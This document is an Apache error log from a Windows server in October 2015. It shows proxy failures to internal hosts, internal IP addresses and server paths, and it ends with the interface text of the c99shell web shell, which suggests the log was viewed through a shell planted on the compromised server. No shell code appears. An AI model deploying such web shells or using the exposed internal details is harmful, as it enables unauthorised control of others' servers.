[Mon Oct 26 11:49:00.720412 2015] [core:warn] [pid 13780:tid 260] AH00098: pid file E:/nuevo/apache/logs/httpd.pid overwritten -- Unclean shutdown of previous Apache run?
[Mon Oct 26 11:49:00.720412 2015] [auth_digest:notice] [pid 13780:tid 260] AH01757: generating secret for digest authentication ...
[Mon Oct 26 11:49:00.845212 2015] [mpm_winnt:notice] [pid 13780:tid 260] AH00455: Apache/2.4.10 (Win32) OpenSSL/1.0.1i configured -- resuming normal operations
[Mon Oct 26 11:49:00.845212 2015] [mpm_winnt:notice] [pid 13780:tid 260] AH00456: Apache Lounge VC11 Server built: Jul 17 2014 11:50:08
[Mon Oct 26 11:49:00.845212 2015] [core:notice] [pid 13780:tid 260] AH00094: Command line: 'e:\\nuevo\\apache\\bin\\httpd.exe -d E:/nuevo/apache'
[Mon Oct 26 11:49:00.845212 2015] [mpm_winnt:notice] [pid 13780:tid 260] AH00418: Parent: Created child process 19552
AH00548: NameVirtualHost has no effect and will be removed in the next release E:/nuevo/apache/conf/extra/httpd-vhosts.conf:44
[Mon Oct 26 11:49:01.500414 2015] [auth_digest:notice] [pid 19552:tid 272] AH01757: generating secret for digest authentication ...
[Mon Oct 26 11:49:01.640814 2015] [mpm_winnt:notice] [pid 19552:tid 272] AH00354: Child: Starting 1920 worker threads.
[Mon Oct 26 12:24:12.152921 2015] [cgi:error] [pid 19552:tid 15844] [client 115.239.248.245:4974] script not found or unable to stat: E:/nuevo/cgi-bin/common
[Mon Oct 26 13:07:08.779246 2015] [proxy_http:error] [pid 19552:tid 15892] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:56801] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=FiltroNotaMejora.asp&EsAbierta=1&ConMenu=NO
[Mon Oct 26 13:07:08.779246 2015] [proxy:error] [pid 19552:tid 15892] [client 201.245.192.253:56801] AH00898: Error reading from remote server returned by /isolucionsda/FrameSetGeneral.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=FiltroNotaMejora.asp&EsAbierta=1&ConMenu=NO
[Mon Oct 26 13:22:19.306046 2015] [proxy_http:error] [pid 19552:tid 15664] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:38461] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 13:22:19.306046 2015] [proxy:error] [pid 19552:tid 15664] [client 201.245.192.253:38461] AH00898: Error reading from remote server returned by /isolucionsda/MagazinHome.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 13:28:08.279659 2015] [proxy_http:error] [pid 19552:tid 15856] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:53555] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Oct 26 13:28:08.279659 2015] [proxy:error] [pid 19552:tid 15856] [client 201.245.192.253:53555] AH00898: Error reading from remote server returned by /isolucionsda/g/Bot_Home.jpg, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Oct 26 13:38:26.961145 2015] [mpm_winnt:warn] [pid 19552:tid 17076] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Oct 26 13:38:26.961145 2015] [mpm_winnt:warn] [pid 19552:tid 17076] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Oct 26 13:43:31.036879 2015] [proxy_http:error] [pid 19552:tid 15672] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:55698] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/Session.asp?Continue=1
[Mon Oct 26 13:46:49.890429 2015] [proxy_http:error] [pid 19552:tid 15844] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:59165] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Oct 26 14:08:56.594759 2015] [proxy_http:error] [pid 19552:tid 15956] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:58113] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp
[Mon Oct 26 14:38:28.400071 2015] [proxy_http:error] [pid 19552:tid 15628] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:58750] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 14:38:28.400071 2015] [proxy:error] [pid 19552:tid 15628] [client 201.245.192.253:58750] AH00898: Error reading from remote server returned by /IsolucionSDA/Encabezado.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 14:40:58.378734 2015] [proxy_http:error] [pid 19552:tid 15832] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:49635] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 14:40:58.378734 2015] [proxy:error] [pid 19552:tid 15832] [client 201.245.192.253:49635] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraFavoritos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 14:50:56.904986 2015] [proxy_http:error] [pid 19552:tid 15988] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:14660] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 14:50:56.904986 2015] [proxy:error] [pid 19552:tid 15988] [client 201.245.192.253:14660] AH00898: Error reading from remote server returned by /IsolucionSDA/MagazinHome.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 14:52:47.415580 2015] [proxy_http:error] [pid 19552:tid 15600] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:51451] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=ListadoMaestroDocumentos3.asp
[Mon Oct 26 14:59:41.331107 2015] [mpm_winnt:warn] [pid 19552:tid 17076] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Oct 26 15:06:27.228220 2015] [mpm_winnt:error] [pid 19552:tid 47140] AH00326: Server ran out of threads to serve requests. Consider raising the ThreadsPerChild setting
[Mon Oct 26 15:11:47.309582 2015] [mpm_winnt:warn] [pid 24320:tid 260] AH00445: ThreadsPerChild of 2500 exceeds ThreadLimit of 1920, decreasing to match
[Mon Oct 26 15:11:47.356382 2015] [core:warn] [pid 24320:tid 260] AH00098: pid file E:/nuevo/apache/logs/httpd.pid overwritten -- Unclean shutdown of previous Apache run?
[Mon Oct 26 15:11:47.356382 2015] [auth_digest:notice] [pid 24320:tid 260] AH01757: generating secret for digest authentication ...
[Mon Oct 26 15:11:47.481182 2015] [mpm_winnt:notice] [pid 24320:tid 260] AH00455: Apache/2.4.10 (Win32) OpenSSL/1.0.1i configured -- resuming normal operations
[Mon Oct 26 15:11:47.481182 2015] [mpm_winnt:notice] [pid 24320:tid 260] AH00456: Apache Lounge VC11 Server built: Jul 17 2014 11:50:08
[Mon Oct 26 15:11:47.481182 2015] [core:notice] [pid 24320:tid 260] AH00094: Command line: 'e:\\nuevo\\apache\\bin\\httpd.exe -d E:/nuevo/apache'
[Mon Oct 26 15:11:47.481182 2015] [mpm_winnt:notice] [pid 24320:tid 260] AH00418: Parent: Created child process 19336
AH00548: NameVirtualHost has no effect and will be removed in the next release E:/nuevo/apache/conf/extra/httpd-vhosts.conf:44
[Mon Oct 26 15:11:48.136383 2015] [auth_digest:notice] [pid 19336:tid 272] AH01757: generating secret for digest authentication ...
[Mon Oct 26 15:11:48.261183 2015] [mpm_winnt:notice] [pid 19336:tid 272] AH00354: Child: Starting 1920 worker threads.
[Mon Oct 26 15:30:11.714522 2015] [cgi:error] [pid 19336:tid 15820] [client 115.239.248.245:1773] script not found or unable to stat: E:/nuevo/cgi-bin/common
[Mon Oct 26 15:47:50.160781 2015] [proxy:error] [pid 19336:tid 15760] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 192.168.175.30:80 (192.168.175.30) failed
[Mon Oct 26 15:47:50.160781 2015] [proxy:error] [pid 19336:tid 15760] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.30) for 60s
[Mon Oct 26 15:47:50.160781 2015] [proxy_http:error] [pid 19336:tid 15760] [client 66.249.64.101:61419] AH01114: HTTP: failed to make connection to backend: 192.168.175.30
[Mon Oct 26 15:56:34.618102 2015] [mpm_winnt:warn] [pid 19336:tid 17824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Oct 26 16:02:44.198351 2015] [mpm_winnt:warn] [pid 19336:tid 17824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Oct 26 16:06:26.592342 2015] [proxy_http:error] [pid 19336:tid 15324] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:58655] AH01095: prefetch request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/isolucionsda/ListadoMaestroDocumentos3.asp
[Mon Oct 26 16:40:30.446531 2015] [proxy_http:error] [pid 19336:tid 15668] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client ::1:57840] AH01102: error reading status line from remote server 192.168.173.24:80, referer: http://localhost/redairebogota/
[Mon Oct 26 16:40:30.446531 2015] [proxy:error] [pid 19336:tid 15668] [client ::1:57840] AH00898: Error reading from remote server returned by /redairebogota/Title.aspx, referer: http://localhost/redairebogota/
[Mon Oct 26 18:01:30.044267 2015] [proxy_http:error] [pid 19336:tid 15860] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:35895] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 18:01:30.044267 2015] [proxy:error] [pid 19336:tid 15860] [client 201.245.192.253:35895] AH00898: Error reading from remote server returned by /isolucionsda/MagazinHome.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Oct 26 19:31:39.604368 2015] [core:error] [pid 19336:tid 14976] (20024)The given path is misformatted or contained invalid characters: [client 168.61.152.85:37856] AH00127: Cannot map GET /galeria/carrusel/Carrusel/jquery-ui-%0A%0A1.8.13.custom.min.js HTTP/1.1 to file
[Mon Oct 26 20:15:12.765958 2015] [core:error] [pid 19336:tid 15772] (20024)The given path is misformatted or contained invalid characters: [client 52.23.156.32:65158] AH00127: Cannot map GET /galeria/carrusel/Carrusel/jquery-ui-%0A%0A1.8.13.custom.min.js HTTP/1.1 to file
[Mon Oct 26 20:56:07.758870 2015] [mpm_winnt:warn] [pid 19336:tid 17824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Oct 26 22:16:03.832294 2015] [core:error] [pid 19336:tid 15136] (20024)The given path is misformatted or contained invalid characters: [client 190.252.156.85:11841] AH00127: Cannot map GET /galeria/carrusel/Carrusel/jquery-ui-%0A%0A1.8.13.custom.min.js HTTP/1.1 to file, referer: http://ambientebogota.gov.co/inicio
[Mon Oct 26 23:31:52.708684 2015] [mpm_winnt:warn] [pid 19336:tid 17824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0468 ]--